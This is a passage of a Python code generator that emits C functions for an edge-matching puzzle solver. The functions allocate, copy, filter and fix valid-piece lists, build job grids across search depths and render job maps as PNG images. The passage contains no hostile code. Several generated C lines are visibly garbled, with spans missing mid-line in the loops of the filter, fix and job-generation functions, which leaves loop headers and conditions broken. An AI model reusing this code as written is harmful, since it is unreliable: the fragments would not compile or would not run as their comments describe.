'+out+'\"\\\\n\" );' ),\n\t\t\t\t\t\t(1, prefix+'printf( '+out+'\"Total: %llu '+uname+'/s\\\\n\", total );' ),\n\t\t\t\t\t\t])\n\n\t\t\t\telse:\n\t\t\t\t\toutput.extend( [\n\t\t\t\t\t\t(1, 'for (y = 0; y < H; y++) {' ),\n\t\t\t\t\t\t(2, 'for (x = 0; x < W; x++) {' ),\n\t\t\t\t\t\t(3, 'count = space_count[ x+(y*W) ];' ),\n\t\t\t\t\t\t(3, prefix+'printf( '+out+'\"%llu \", count);' ),\n\t\t\t\t\t\t(2, '} // x' ),\n\t\t\t\t\t\t(1, '} // y' ),\n\t\t\t\t\t\t(1, prefix+'printf( '+out+'\"\\\\n\" );' ),\n\t\t\t\t\t\t#(1, prefix+'printf( '+out+'\"Total: %llu '+uname+'/s\\\\n\", total );' ),\n\t\t\t\t\t\t])\n\n\n\t\t\t\toutput.extend( [\n\t\t\t\t\t(1, 'fflush(stdout);' if prefix == \"\" else \"\"), 
\n\t\t\t\t\t(0, '}' ),\n\t\t\t\t\t(0, ''), \n\t\t\t\t\t] )\n\n\n\t\treturn output\n\n\t# ----- Allocate\n\tdef gen_AllocateValidPieces_function( self, only_signature=False ):\n\t\t\n\t\toutput = [ \n\t\t\t(0, \"t_piece_full * AllocateValidPieces(\"),\n\t\t\t(1, \"p_bigpicture bigpicture\"),\n\t\t\t]\n\n\t\tif only_signature:\n\t\t\toutput.extend( [ (1, ');'), ])\n\t\t\treturn output\n\n\t\toutput.extend( [\n\t\t\t(1, \") {\"),\n\t\t\t(1, \"\"),\n\t\t\t(1, \"bigpicture->stats_allocate++;\"),\n\t\t\t(1, 'return (t_piece_full *)(malloc(sizeof(t_piece_full)*WH*WH*4));' ),\n\t\t\t(1, \"\"),\n\t\t\t(0, \"}\"),\n\t\t\t])\n\n\t\treturn output\n\n\t# ----- Copy\n\tdef gen_CopyValidPieces_function( self, only_signature=False ):\n\t\t\n\t\toutput = [ \n\t\t\t(0, \"t_piece_full * CopyValidPieces(\"),\n\t\t\t(1, \"p_bigpicture bigpicture,\"),\n\t\t\t(1, \"t_piece_full * src_valid_pieces,\"),\n\t\t\t(1, \"t_piece_full * dst_valid_pieces\"),\n\t\t\t]\n\n\t\tif only_signature:\n\t\t\toutput.extend( [ (1, ');'), ])\n\t\t\treturn output\n\n\t\toutput.extend( [\n\t\t\t(1, \") {\"),\n\t\t\t(1, \"\"),\n\t\t\t(1, \"uint64 space;\"),\n\t\t\t(1, \"uint64 piece_index;\"),\n\t\t\t(1, \"\"),\n\t\t\t(1, 'if (src_valid_pieces == NULL) ' ),\n\t\t\t(2, 'return NULL;' ),\n\t\t\t(1, 'if (dst_valid_pieces == NULL) ' ),\n\t\t\t(2, 'return NULL;' ),\n\t\t\t(1, \"\"),\n\t\t\t(1, \"bigpicture->stats_copy++;\"),\n\t\t\t(1, \"\"),\n\t\t\t(1, 'for (space=0; spacestats_filter_valid_pieces++;\"),\n\t\t\t(1, '' ),\n\t\t\t(1, 'for (space=0; space= W) { local_patterns.u = patterns_seen[space-W].d; }'), \n\t\t\t(3, 'if ((space % W) != (W-1)) { local_patterns.r = patterns_seen[space+1].l; }'), \n\t\t\t(3, 'if (space < (WH-W)) { local_patterns.d = patterns_seen[space+W].u; }'), \n\t\t\t(3, 'if ((space % W) != 0 ) { local_patterns.l = patterns_seen[space-1].r; }'), \n\t\t\t(3, '' ),\n\t\t\t(3, 'piece_index = space*WH*4;' ),\n\t\t\t(3, 'dst_piece_index = space*WH*4;' ),\n\t\t\t(3, 'while (current_valid_pieces[piece_index].u != 0xff) {' ),\n\t\t\t(4, '' ),\n\t\t\t(4, 'if ( (local_patterns.u & (1 << current_valid_pieces[piece_index].u)) &&' ),\n\t\t\t(4, ' (local_patterns.r & (1 << current_valid_pieces[piece_index].r)) &&' ),\n\t\t\t(4, ' (local_patterns.d & (1 << current_valid_pieces[piece_index].d)) &&' ),\n\t\t\t(4, ' (local_patterns.l & (1 << current_valid_pieces[piece_index].l)) ) {' ),\n\t\t\t(5, 'result_valid_pieces[dst_piece_index] = current_valid_pieces[piece_index];' ), \n\t\t\t(5, 'dst_piece_index++;' ),\n\t\t\t(4, '} else {' ),\n\t\t\t(5, 'removed++;' ),\n\t\t\t(5, 'space_needs_refresh[space] = 1;' ),\n\t\t\t(4, '}' ),\n\t\t\t(4, '' ),\n\t\t\t(4, 'piece_index++;' ),\n\t\t\t(3, '} // while' ),\n\t\t\t(3, '' ),\n\t\t\t(3, '// If nothing is copied, it is a deadend' ),\n\t\t\t(3, 'if (dst_piece_index == space*WH*4) {' ),\n\t\t\t#(4, 'printf(\"Filter Pieces deadend on space %lld\\\\n\", space);' ),\n\t\t\t(4, \"bigpicture->stats_filter_valid_pieces_dead_end ++;\"),\n\t\t\t(4, 'free(result_valid_pieces);' ),\n\t\t\t(4, 'return NULL;' ),\n\t\t\t(3, '}' ),\n\t\t\t(3, '' ),\n\t\t\t(3, '// Copy 0xff marker at the end of the list' ),\n\t\t\t(3, 'result_valid_pieces[dst_piece_index] = current_valid_pieces[piece_index];' ), \n\t\t\t(3, '' ),\n\t\t\t(2, '} // For space' ),\n\t\t\t(2, '' ),\n\t\t\t(2, '// If we need to go again, we copy into tmp_valid_pieces to use it as the new source' ),\n\t\t\t(2, 'if (removed > 0) {' ),\n\t\t\t(3, 'current_valid_pieces = tmp_valid_pieces;' ),\n\t\t\t(3, 'CopyValidPieces(bigpicture, result_valid_pieces, 
tmp_valid_pieces);' ),\n\t\t\t(2, '}' ),\n\t\t\t(2, '' ),\n\t\t\t(2, \"bigpicture->stats_filter_valid_pieces_removed++;\"),\n\t\t\t(1, '} // While removed' ),\n\t\t\t(1, '' ),\n\t\t\t])\n\n\t\toutput.extend( [\n\t\t\t(1, \"\"),\n\t\t\t(1, 'return result_valid_pieces;' ),\n\t\t\t(0, \"}\"),\n\t\t\t])\n\n\t\treturn output\n\n\t# ----- Filter based on edges/patterns the valid_pieces list\n\tdef gen_FilterValidPiecesOverwrite_function( self, only_signature=False ):\n\t\t\n\t\toutput = []\n\t\toutput.extend( [\n\t\t\t(0, \"p_piece_full FilterValidPiecesOverwrite(\"),\n\t\t\t(1, \"p_bigpicture bigpicture,\"),\n\t\t\t(1, \"p_piece_full valid_pieces\"),\n\t\t\t] )\n\n\t\tif only_signature:\n\t\t\toutput.extend( [ (1, ');'), ])\n\t\t\treturn output\n\n\t\toutput.extend( [\n\t\t\t(1, \") {\"),\n\t\t\t(1, \"\"),\n\t\t\t(1, \"uint64 removed;\"),\n\t\t\t(1, \"uint64 space;\"),\n\t\t\t(1, \"uint64 src_piece_index, dst_piece_index;\"),\n\t\t\t(1, \"t_piece_full piece;\"),\n\t\t\t(1, \"uint8 space_needs_refresh[WH];\"),\n\t\t\t(1, \"t_patterns_seen patterns_seen[WH];\"),\n\t\t\t(1, \"t_patterns_seen local_patterns;\"),\n\t\t\t])\n\n\t\toutput.extend( [\n\t\t\t(1, 'if (valid_pieces == NULL) return NULL;' ),\n\t\t\t(1, '' ),\n\t\t\t(1, \"bigpicture->stats_filter_valid_pieces++;\"),\n\t\t\t(1, '' ),\n\t\t\t(1, 'for (space=0; space= W) { local_patterns.u = patterns_seen[space-W].d; }'), \n\t\t\t(3, 'if ((space % W) != (W-1)) { local_patterns.r = patterns_seen[space+1].l; }'), \n\t\t\t(3, 'if (space < (WH-W)) { local_patterns.d = patterns_seen[space+W].u; }'), \n\t\t\t(3, 'if ((space % W) != 0 ) { local_patterns.l = patterns_seen[space-1].r; }'), \n\t\t\t(3, '' ),\n\t\t\t(3, 'src_piece_index = space*WH*4;' ),\n\t\t\t(3, 'dst_piece_index = space*WH*4;' ),\n\t\t\t(3, 'while (valid_pieces[src_piece_index].u != 0xff) {' ),\n\t\t\t(4, '' ),\n\t\t\t(4, 'if ( (local_patterns.u & (1 << valid_pieces[src_piece_index].u)) &&' ),\n\t\t\t(4, ' (local_patterns.r & (1 << valid_pieces[src_piece_index].r)) &&' ),\n\t\t\t(4, ' (local_patterns.d & (1 << valid_pieces[src_piece_index].d)) &&' ),\n\t\t\t(4, ' (local_patterns.l & (1 << valid_pieces[src_piece_index].l)) ) {' ),\n\t\t\t(5, 'valid_pieces[dst_piece_index] = valid_pieces[src_piece_index];' ), \n\t\t\t(5, 'dst_piece_index++;' ),\n\t\t\t(4, '} else {' ),\n\t\t\t(5, 'removed++;' ),\n\t\t\t(5, 'space_needs_refresh[space] = 1;' ),\n\t\t\t(4, '}' ),\n\t\t\t(4, '' ),\n\t\t\t(4, 'src_piece_index++;' ),\n\t\t\t(3, '} // while' ),\n\t\t\t(3, '' ),\n\t\t\t(3, '' ),\n\t\t\t(3, '// Copy 0xff marker at the end of the list' ),\n\t\t\t(3, 'valid_pieces[dst_piece_index] = valid_pieces[src_piece_index];' ), \n\t\t\t(3, '' ),\n\t\t\t(3, '// If nothing is copied, it is a deadend' ),\n\t\t\t(3, 'if (dst_piece_index == space*WH*4) {' ),\n\t\t\t#(4, 'printf(\"Filter Pieces deadend on space %lld\\\\n\", space);' ),\n\t\t\t(4, \"bigpicture->stats_filter_valid_pieces_dead_end ++;\"),\n\t\t\t(4, 'return NULL;' ),\n\t\t\t(3, '}' ),\n\t\t\t(2, '} // For space' ),\n\t\t\t(2, '' ),\n\t\t\t(2, \"bigpicture->stats_filter_valid_pieces_removed++;\"),\n\t\t\t(1, '} // While removed' ),\n\t\t\t(1, '' ),\n\t\t\t])\n\n\t\toutput.extend( [\n\t\t\t(1, 'return valid_pieces;' ),\n\t\t\t(0, \"}\"),\n\t\t\t])\n\n\t\treturn output\n\n\t# ----- Fix one Piece\n\tdef gen_FixPieces_function( self, only_signature=False ):\n\t\n\t\toutput = []\n\n\t\toutput.extend( [\n\t\t\t(0, \"t_piece_full * FixPieces(\"),\n\t\t\t(1, \"p_bigpicture bigpicture,\"),\n\t\t\t(1, \"p_piece_full valid_pieces,\"),\n\t\t\t(1, \"uint64 
piece_number,\"),\n\t\t\t(1, \"uint64 piece_space,\"),\n\t\t\t(1, \"uint64 piece_rotation\"),\n\t\t\t] )\n\n\t\tif only_signature:\n\t\t\toutput.extend( [ (1, ');'), ])\n\t\t\treturn output\n\n\t\toutput.extend( [\n\t\t\t(1, \") {\"),\n\t\t\t(1, \"uint64 space;\"),\n\t\t\t(1, \"uint64 piece_index, dst_piece_index;\"),\n\t\t\t(1, \"\" ),\n\t\t\t(1, \"t_piece_full * dst_valid_pieces;\" ),\n\t\t\t(1, \"\"),\n\t\t\t(1, 'if (valid_pieces == NULL) ' ),\n\t\t\t(2, 'return NULL;' ),\n\t\t\t(1, '' ),\n\t\t\t(1, \"bigpicture->stats_fix_pieces ++;\"),\n\t\t\t(1, '' ),\n\t\t\t(1, \"dst_valid_pieces = AllocateValidPieces(bigpicture);\"),\n\t\t\t(1, 'for (space=0; spacestats_fix_pieces_dead_end ++;\"),\n\t\t\t(3, 'free(dst_valid_pieces);'),\n\t\t\t(3, 'return NULL;' ),\n\t\t\t(2, '}' ),\n\t\t\t(1, '} // For space' ),\n\t\t\t(1, '' ),\n\t\t\t])\n\n\t\toutput.extend( [\n\t\t\t(1, \"\"),\n\t\t\t(1, 'return dst_valid_pieces;' ),\n\t\t\t(0, \"}\"),\n\t\t\t])\n\n\t\treturn output\n\t\n\t# ----- Fix one Piece\n\tdef gen_FixPiecesOverwrite_function( self, only_signature=False ):\n\t\n\t\toutput = []\n\t\toutput.extend( [\n\t\t\t(0, \"t_piece_full * FixPiecesOverwrite(\"),\n\t\t\t(1, \"p_bigpicture bigpicture,\"),\n\t\t\t(1, \"p_piece_full valid_pieces,\"),\n\t\t\t(1, \"uint64 piece_number,\"),\n\t\t\t(1, \"uint64 piece_space,\"),\n\t\t\t(1, \"uint64 piece_rotation\"),\n\t\t\t] )\n\n\t\tif only_signature:\n\t\t\toutput.extend( [ (1, ');'), ])\n\t\t\treturn output\n\n\t\toutput.extend( [\n\t\t\t(1, \") {\"),\n\t\t\t(1, \"uint64 space;\"),\n\t\t\t(1, \"uint64 src_piece_index, dst_piece_index;\"),\n\t\t\t(1, \"\" ),\n\t\t\t(1, 'if (valid_pieces == NULL)' ),\n\t\t\t(2, 'return NULL;' ),\n\t\t\t(1, '' ),\n\t\t\t(1, \"bigpicture->stats_fix_pieces ++;\"),\n\t\t\t(1, '' ),\n\t\t\t(1, 'for (space=0; spacestats_fix_pieces_dead_end ++;\"),\n\t\t\t(3, 'return NULL;' ),\n\t\t\t(2, '}' ),\n\t\t\t(1, '} // For space' ),\n\t\t\t(1, '' ),\n\t\t\t])\n\n\t\toutput.extend( [\n\t\t\t(1, \"\"),\n\t\t\t(1, 'return valid_pieces;' ),\n\t\t\t(0, \"}\"),\n\t\t\t])\n\n\t\treturn output\n\t\n\t# ----- get the jobs\n\tdef gen_getJobs_function( self, only_signature=False ):\n\t\t\n\t\toutput = [ \n\t\t\t(0, \"p_job getJobs(\"),\n\t\t\t(1, \"p_bigpicture bigpicture,\"),\n\t\t\t(1, \"p_piece_full valid_pieces,\"),\n\t\t\t(1, \"p_piece_fixed pre_fixed,\"),\n\t\t\t(1, \"uint64 max_width,\"),\n\t\t\t(1, \"uint64 max_height\"),\n\t\t\t]\n\n\t\tif only_signature:\n\t\t\toutput.extend( [ (1, ');'), ])\n\t\t\treturn output\n\n\t\toutput.extend( [\n\t\t\t(1, \") {\"),\n\t\t\t(1, \"\"),\n\t\t\t(2, \"t_piece_full * current_valid_pieces;\" ),\n\t\t\t(2, \"t_piece_full * new_valid_pieces;\" ),\n\t\t\t(2, \"uint64 i;\"),\n\t\t\t(2, \"uint64 depth;\"),\n\t\t\t(2, \"uint64 orientation;\"),\n\t\t\t(2, \"uint64 space;\"),\n\t\t\t(2, \"uint64 piece_index;\"),\n\t\t\t(2, \"uint64 new_column_width[16384];\"),\n\t\t\t(2, \"uint64 new_line_height[16384];\"),\n\t\t\t(2, \"uint64 new_column_position[16384];\"),\n\t\t\t(2, \"uint64 new_line_position[16384];\"),\n\t\t\t(2, \"uint64 width[WH+1];\"),\n\t\t\t(2, \"uint64 height[WH+1];\"),\n\t\t\t(2, \"t_job * all_jobs[WH+1];\"),\n\t\t\t(2, \"t_job first_job[2];\"),\n\t\t\t(2, \"uint64 jobs_index;\"),\n\t\t\t(2, \"uint64 previous_jobs_index;\"),\n\t\t\t(2, \"uint64 lowest_valid_pieces;\"),\n\t\t\t(2, \"uint64 best_space;\"),\n\t\t\t(2, \"uint64 len_valid_pieces;\"),\n\t\t\t(2, \"uint64 shift_x;\"),\n\t\t\t(2, \"uint64 shift_y;\"),\n\t\t\t(1, \"\"),\n\t\t\t(1, 'FILE * output;' ),\n\t\t\t(1, 'FILE * jobsfile;' ),\n\t\t\t(1, 
'uint8 was_allocated;' ),\n\t\t\t(1, 'uint8 TTF;' ),\n\t\t\t(1, \"\"),\n\t\t\t(1, 'was_allocated = 0;' ),\n\t\t\t(1, 'if (bigpicture == NULL) {' ),\n\t\t\t(2, 'bigpicture = (p_bigpicture)allocate_bigpicture();'), \n\t\t\t(2, 'was_allocated = 1;' ),\n\t\t\t#(2, 'xorCommands(bigpicture, SHOW_STATS);' ),\n\t\t\t(1, '}'), \n \t\t\t(2, \"bigpicture->commands |= CLEAR_SCREEN;\"),\n \t\t\t(2, \"bigpicture->commands |= SHOW_STATS;\"),\n\t\t\t(1, \"\"),\n\t\t\t(1, 'TTF=0;' ),\n\t\t\t(1, '' ),\n\t\t\t(2, \"\"),\n\t\t\t(1, '// Output' ),\n\t\t\t(1, 'output = stdout;' ),\n\t\t\t#(1, 'if (thread_output_filename != NULL) {' ),\n\t\t\t#(2, 'output = fopen( thread_output_filename, \"a\" );' ),\n\t\t\t#(2, 'if (!output) { printf(\"Can\\'t open %s\\\\n\", thread_output_filename); return -1; }' ),\n\t\t\t#(1, '}' ),\n\t\t\t(1, \"\"),\n\t\t\t(1, \"\"),\n\t\t\t(2, 'if (valid_pieces == NULL) ' ),\n\t\t\t#(3, 'return NULL;' ),\n\t\t\t(3, 'valid_pieces = static_valid_pieces;' ),\n\t\t\t(1, \"\"),\n\t\t\t(1, \"\"),\n\t\t\t(2, \"// Depth goes from -1 to WH, so we adjust with +1\"),\n\t\t\t(2, \"depth = \"+str(len(self.puzzle.extra_fixed+self.puzzle.fixed))+\";\"), #TODO\n\t\t\t(2, \"depth += 1;\"),\n\t\t\t(2, '' ),\n\t\t\t(2, '// Starting point' ),\n\t\t\t(2, \"first_job[0].x = 0;\"),\n\t\t\t(2, \"first_job[0].y = 0;\"),\n\t\t\t(2, \"first_job[0].valid_pieces = valid_pieces;\"),\n\t\t\t(2, \"first_job[1].x = 0xffffffff; // Marks the end of the list\"),\n\t\t\t(2, \"all_jobs[depth-1] = first_job;\"),\n\t\t\t(2, \"width[depth-1] = 1;\"),\n\t\t\t(2, \"height[depth-1] = 1;\"),\n\t\t\t(2, \"\"),\n\t\t\t(2, \"\"),\n\t\t\t(2, \"while ((depth < WH+1)&&!TTF) {\"),\n\t\t\t(2, \"\"),\n\t\t\t(3, \"orientation = depth % 2;\"),\n\t\t\t(3, \"width[depth] = 0;\"),\n\t\t\t(3, \"height[depth] = 0;\"),\n\t\t\t(3, \"all_jobs[depth] = (t_job *)(malloc(sizeof(t_job)*16384*16384));\"),\n\t\t\t(3, \"jobs_index = 0;\"),\n\t\t\t(3, \"for(i=0; i<16384; i++){\"),\n\t\t\t(4, \"new_column_width[i] = 1;\"),\n\t\t\t(4, \"new_line_height[i] = 1;\"),\n\t\t\t(3, \"}\"),\n\t\t\t(3, \"\"),\n\t\t\t(3, \"previous_jobs_index = 0;\"),\n\t\t\t(3, \"while ((all_jobs[depth-1][previous_jobs_index].x != 0xffffffff)&&!TTF) {\"),\n\t\t\t(4, \"\"),\n\t\t\t(4, \"if (bigpicture != NULL) {\"),\n\t\t\t(5, 'if (bigpicture->check_commands) {'),\n\t\t\t(6, 'bigpicture->check_commands = 0;'),\n\t\t\t(6, 'fdo_commands(output, bigpicture);' ),\n\t\t\t(6, 'TTF = getTTF(bigpicture);' ),\n\t\t\t(5, \"}\"),\n\t\t\t(4, \"}\"),\n\t\t\t(4, \"\"),\n\t\t\t(4, \"current_valid_pieces = all_jobs[depth-1][previous_jobs_index].valid_pieces;\"),\n\t\t\t(4, \"lowest_valid_pieces = WH*4;\"),\n\t\t\t(4, \"best_space = WH*4;\"),\n\t\t\t(4, \"\"),\n\t\t\t(4, 'for (space=0; space 1) {\"),\n\t\t\t(6, \"if (len_valid_pieces < lowest_valid_pieces) {\"),\n\t\t\t(7, \"lowest_valid_pieces = len_valid_pieces;\"),\n\t\t\t(7, \"best_space = space;\"),\n\t\t\t(6, \"}\"),\n\t\t\t(5, \"}\"),\n\t\t\t(4, \"}\"),\n\t\t\t(4, \"if (best_space == WH*4) {\"),\n\t\t\t(5, 'printf(\"No best_space found, continuing\\\\n\");'),\n\t\t\t(5, \"continue; // While all_jobs\"),\n\t\t\t(4, \"}\"),\n\t\t\t(4, \"\"),\n\t\t\t(4, \"shift_x = 0;\"),\n\t\t\t(4, \"shift_y = 0;\"),\n\t\t\t(4, 'piece_index = best_space*WH*4;' ),\n\t\t\t(4, 'while ((current_valid_pieces[piece_index].u != 0xff)&&!TTF) {' ),\n\t\t\t(5, \"new_valid_pieces = FilterValidPiecesOverwrite( bigpicture, FixPieces( bigpicture, current_valid_pieces, current_valid_pieces[piece_index].number, best_space, current_valid_pieces[piece_index].rotation));\"),\n\t\t\t(5, 
\"if (new_valid_pieces != NULL) {\"),\n\t\t\t(6, \"all_jobs[depth][jobs_index].x = all_jobs[depth-1][previous_jobs_index].x;\"),\n\t\t\t(6, \"all_jobs[depth][jobs_index].y = all_jobs[depth-1][previous_jobs_index].y;\"),\n\t\t\t(6, \"all_jobs[depth][jobs_index].shift_x = shift_x;\"),\n\t\t\t(6, \"all_jobs[depth][jobs_index].shift_y = shift_y;\"),\n\t\t\t(6, \"all_jobs[depth][jobs_index].valid_pieces = new_valid_pieces;\"),\n\t\t\t(6, \"if (orientation == 0) {\"),\n\t\t\t(7, \"shift_x++;\"),\n\t\t\t(7, \"if (shift_x > new_column_width[ all_jobs[depth-1][previous_jobs_index].x ])\"),\n\t\t\t(8, \"new_column_width[ all_jobs[depth-1][previous_jobs_index].x ] = shift_x;\"),\n\t\t\t(6, \"} else {\"),\n\t\t\t(7, \"shift_y++;\"),\n\t\t\t(7, \"if (shift_y > new_line_height[ all_jobs[depth-1][previous_jobs_index].y ])\"),\n\t\t\t(8, \"new_line_height[ all_jobs[depth-1][previous_jobs_index].y ] = shift_y;\"),\n\t\t\t(6, \"}\"),\n\t\t\t(6, \"jobs_index++;\"),\n\t\t\t(5, \"} // new_valid_pieces\"),\n\t\t\t(5, \"piece_index ++;\"),\n\t\t\t(4, \"}\"),\n\t\t\t(4, \"\"),\n\t\t\t(4, \"previous_jobs_index ++;\"),\n\t\t\t(3, \"} // While all_jobs\"),\n\t\t\t(3, \"\"),\n\t\t\t(3, \"\"),\n\t\t\t(3, \"all_jobs[depth][jobs_index].x = 0xffffffff; // Marks the end of the list\"),\n\t\t\t(3, \"\"),\n\t\t\t(3, \"if (!TTF) {\"),\n\t\t\t(4, \"// Adjust the coordinates\"),\n\t\t\t(4, \"new_column_position[0] = 0;\"),\n\t\t\t(4, \"for (i=0; i %lld\\\\n\", depth, width[depth], height[depth], jobs_index);' ),\n\t\t\t(4, \"\"),\n\t\t\t(4, \"// Write jobs\"),\n\t\t\t(4, 'jobsfile = fopen( \"jobs/'+self.getFileFriendlyName( self.puzzle.name )+'_output.txt\", \"a\" );' ),\n\t\t\t(4, 'if (!jobsfile) { printf(\"Can\\'t open %s\\\\n\", \"jobs/'+self.getFileFriendlyName( self.puzzle.name )+'_output.txt\"); return NULL; }' ),\n\t\t\t(4, \"jobs_index = 0;\"),\n\t\t\t(4, \"while ((all_jobs[depth][jobs_index].x != 0xffffffff)&&!TTF) {\"),\n\t\t\t(5, 'fprintf(jobsfile, \"%lld_%lld_%lld|[\", depth, all_jobs[depth][jobs_index].x, all_jobs[depth][jobs_index].y);'),\n\t\t\t(5, 'for (space=0; space max_width) && (height[depth] > max_height)) break;\"),\n\t\t\t(3, \"}\"),\n\t\t\t(3, \"\"),\n\t\t\t(3, \"depth ++;\"),\n\t\t\t(2, \"} // While Depth\"),\n\n\t\t\t(1, 'if (output != stdout) {' ),\n\t\t\t(2, 'fclose(output);' ),\n\t\t\t(1, '}' ),\n\n\t\t\t(1, 'if (was_allocated) {'), \n\t\t\t(2, 'free_bigpicture(bigpicture);'), \n\t\t\t(2, 'bigpicture = NULL;'), \n\t\t\t(1, '}'), \n\n\t\t\t(2, 'return NULL;' ),\n\t\t\t(1, \"\"),\n\t\t\t(0, \"}\"),\n\t\t\t])\n\n\t\treturn output\n\n\t# ----- \n\tdef getJobsinPython( self, valid_pieces, pre_fixed=[], max_width=1024, max_height=1024):\n\n\t\tif valid_pieces == None:\n\t\t\treturn None\n\n\t\twidth = {}\n\t\theight = {}\n\n\t\tall_valid_pieces = {}\n\t\tcurrent_valid_pieces = valid_pieces\n\n\t\t#for x in pre_fixed:\n\t\t#\tcurrent_valid_pieces = self.fixPiece( current_valid_pieces ....)\n\n\t\t#depth = len(self.puzzle.extra_fixed+self.puzzle.fixed+pre_fixed)\n\t\t#new_valid_\n\n\t\tdepth = len(self.puzzle.extra_fixed+self.puzzle.fixed)\n\n\t\tall_valid_pieces[ depth-1 ] = [ (0, 0, current_valid_pieces) ]\n\t\twidth[ depth-1 ] = 1\n\t\theight[ depth-1 ] = 1\n\n\t\twhile depth < self.puzzle.board_wh:\n\n\t\t\torientation = depth % 2\n\t\t\twidth[ depth ] = 0\n\t\t\theight[ depth ] = 0\n\t\t\tall_valid_pieces[ depth ] = []\n\n\n\t\t\tnew_column_width = [1] * (width[depth-1])\n\t\t\tnew_line_height = [1] * (height[depth-1])\n\n\t\t\ttmp_valid_pieces = []\n\n\t\t\tfor old_x, old_y, current_valid_pieces in 
all_valid_pieces[ depth-1 ]:\n\t\t\t\t\n\t\t\t\t#print(\"Depth\", depth, \"Old coordonates\", old_x,\",\",old_y)\n\n\t\t\t\tlowest_valid_pieces = self.puzzle.board_wh*4\n\t\t\t\tbest_space = None\n\n\t\t\t\t# Look for the space with the minimum possibilities\n\t\t\t\tfor space in range(self.puzzle.board_wh):\n\t\t\t\t\tif len(current_valid_pieces[ space ]) > 1:\n\t\t\t\t\t\tif len(current_valid_pieces[ space ]) < lowest_valid_pieces:\n\t\t\t\t\t\t\tlowest_valid_pieces = len(current_valid_pieces[ space ])\n\t\t\t\t\t\t\tbest_space = space\n\n\t\t\t\tif best_space == None:\n\t\t\t\t\tprint(\"No best_space found, continuing\")\n\t\t\t\t\tcontinue\n\n\n\t\t\t\t# Add the new jobs\n\t\t\t\tnew_x = 0\n\t\t\t\tnew_y = 0\n\t\t\t\tfor p in current_valid_pieces[ best_space ]:\n\t\t\t\t\tnew_valid_pieces = self.filterValidPieces( self.fixPiece( current_valid_pieces, p.p, best_space, p.rotation) )\n\t\t\t\t\tif new_valid_pieces != None:\n\t\t\t\t\t\ttmp_valid_pieces.append( (old_x, new_x, old_y, new_y, new_valid_pieces) )\n\n\t\t\t\t\t\tif orientation == 0:\n\t\t\t\t\t\t\tnew_x += 1\n\t\t\t\t\t\t\tif new_x > new_column_width[old_x]:\n\t\t\t\t\t\t\t\tnew_column_width[old_x] = new_x\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tnew_y += 1\n\t\t\t\t\t\t\tif new_y > new_line_height[old_y]:\n\t\t\t\t\t\t\t\tnew_line_height[old_y] = new_y\n\n\t\t\t\t\n\t\t\t# Adjust the coordinates of the jobs\n\t\t\tnew_column_position = [0]\n\t\t\tfor n in new_column_width:\n\t\t\t\tnew_column_position.append( new_column_position[-1] + n )\n\n\t\t\tnew_line_position = [0]\n\t\t\tfor n in new_line_height:\n\t\t\t\tnew_line_position.append( new_line_position[-1] + n )\n\n\t\t\tfor old_x, new_x, old_y, new_y, valid_pieces in tmp_valid_pieces:\n\t\t\t\tactual_x = new_x+new_column_position[old_x]\n\t\t\t\tactual_y = new_y+new_line_position[old_y]\n\n\t\t\t\t#print(\"Depth\", depth, \"Coordonates\", old_x,old_y, \" -> \", actual_x, actual_y)\n\n\t\t\t\tall_valid_pieces[ depth ].append( (actual_x, actual_y, valid_pieces) )\n\n\n\t\t\twidth[ depth ] = new_column_position[-1]\n\t\t\theight[ depth ] = new_line_position[-1]\n\n\t\t\tprint(\"Depth\", depth, \"Size of the jobs:\", width[depth], \"x\", height[depth], \"=>\", len(all_valid_pieces[ depth ]))\n\t\t\tprint()\n\n\t\t\t# Write the output\n\t\t\toutput = \"\"\n\t\t\tfor x, y, current_valid_pieces in all_valid_pieces[ depth ]:\n\t\t\t\tjobid = str(depth)+\"_\"+str(x)+\"_\"+str(y)\n\t\t\t\textra_fixed=[]\n\t\t\t\tfor space in range(self.puzzle.board_wh):\n\t\t\t\t\tif (len(current_valid_pieces[ space ]) == 1) and (self.puzzle.static_spaces_type[ space ] != \"fixed\"): \n\t\t\t\t\t\tpiece = current_valid_pieces[ space ][0]\n\t\t\t\t\t\textra_fixed.append( (piece.p, space, piece.rotation) )\n\t\t\t\toutput += jobid+\"|\"+str(extra_fixed)+\"\\n\"\n\t\t\t\n\t\t\tjobsfile = open( \"jobs/\"+self.getFileFriendlyName( self.puzzle.name )+\"_\"+str(depth)+\"_\"+str(pre_fixed)+\".jobs.txt\", \"w\" )\n\t\t\tjobsfile.write(output)\n\t\t\tjobsfile.close()\n\n\t\t\tif width[ depth ] > max_width and height[ depth ] > max_height:\n\t\t\t\t\tbreak\n\t\t\t\t\n\t\t\tdepth += 1\n\n\n\t\t#print(\"Len of valid_pieces:\", len(all_valid_pieces[-1]))\n\n\t\treturn all_valid_pieces[-1]\n\n\n\tdef getImages( self, pre_fixed=[] ):\n\n\t\tfilename = \"jobs/\"+self.getFileFriendlyName( self.puzzle.name )+\"_output.txt\"\n\n\t\tif os.path.exists(filename):\n\t\t\t\n\t\t\t# Read the data\n\t\t\tcoordinates_for_depth={}\n\t\t\tfor depth in range(-1, self.puzzle.board_wh):\n\t\t\t\tcoordinates_for_depth[depth] = 
[]\n\n\t\t\tjobsfile = open( filename, \"r\" )\n\t\t\tmax_x = 0\n\t\t\tmax_y = 0\n\t\t\tfor line in jobsfile:\n\t\t\t\tif line.startswith('#'):\n\t\t\t\t\tcontinue\n\t\t\t\tline = line.strip('\\n').strip(' ')\n\t\t\t\tline = line.split(\"|\")\n\t\t\t\tline = line[0].split(\"_\")\n\t\t\t\tdepth=int(line[0])\n\t\t\t\tx=int(line[1])\n\t\t\t\ty=int(line[2])\n\t\t\t\tif x > max_x:\n\t\t\t\t\tmax_x = x\n\t\t\t\tif y > max_y:\n\t\t\t\t\tmax_y = y\n\t\t\t\tcoordinates_for_depth[depth].append( (x, y) )\n\t\t\tjobsfile.close()\n\n\t\t\n\t\t\t# Create the image\n\t\t\tfor depth in range(-1, self.puzzle.board_wh):\n\t\t\t\tif len(coordinates_for_depth[depth]) == 0:\n\t\t\t\t\tcontinue\n\n\t\t\t\tprint( \"Generate Image for depth\", depth )\n\n\t\t\t\t# Create the blank image\n\t\t\t\tw = png.Writer(max_x+1, max_y+1, greyscale=True)\n\t\t\t\timg = []\n\t\t\t\tfor h in range(max_y+1):\n\t\t\t\t\tl = [ 0 ] * (max_x+1)\n\t\t\t\t\timg.append(l)\n\n\t\t\t\t# Insert the jobs\n\t\t\t\tfor x,y in coordinates_for_depth[depth]:\n\t\t\t\t\timg[y][x] = 255\n\n\t\t\t\t# Write the image\n\t\t\t\tf = 